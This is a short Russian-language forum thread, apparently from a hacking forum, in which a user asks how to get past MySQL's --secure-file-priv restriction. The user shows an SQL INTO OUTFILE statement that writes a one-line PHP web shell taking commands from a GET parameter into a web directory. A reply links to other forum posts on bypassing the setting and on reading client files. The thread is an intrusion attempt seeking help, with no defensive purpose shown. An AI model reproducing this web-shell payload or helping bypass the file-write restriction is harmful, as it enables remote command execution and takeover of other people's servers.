Доброго времени. Просьба подсказать по такому вопросу. Имею доступ к записи данных в бд. При попытке импортировать .sql файл с таким содержимым в базу: Code: select '<?php system($_GET["cmd"]); ?>' into outfile '/home/www/ .... /shell.php' Получаю: Code: Error: The MySQL server is running with the --secure-file-priv option so it cannot execute this statement Возможно ли это как-то обойти? Если да, то каким образом?
Доброго. Без указания используемого программного обеспечения и самое главное, версий, трудно что либо ответить однозначно. Поэтому предлагаю ознакомиться самомстоятельно. По поводу secure-file-priv: https://antichat.com/threads/453986/#post-4114489 Возможный обход (#flag 5): https://antichat.com/threads/469355/page-3#post-4299433 Так же, кейс может попасть под возможность почитать клинтские файлы: https://antichat.com/threads/469196/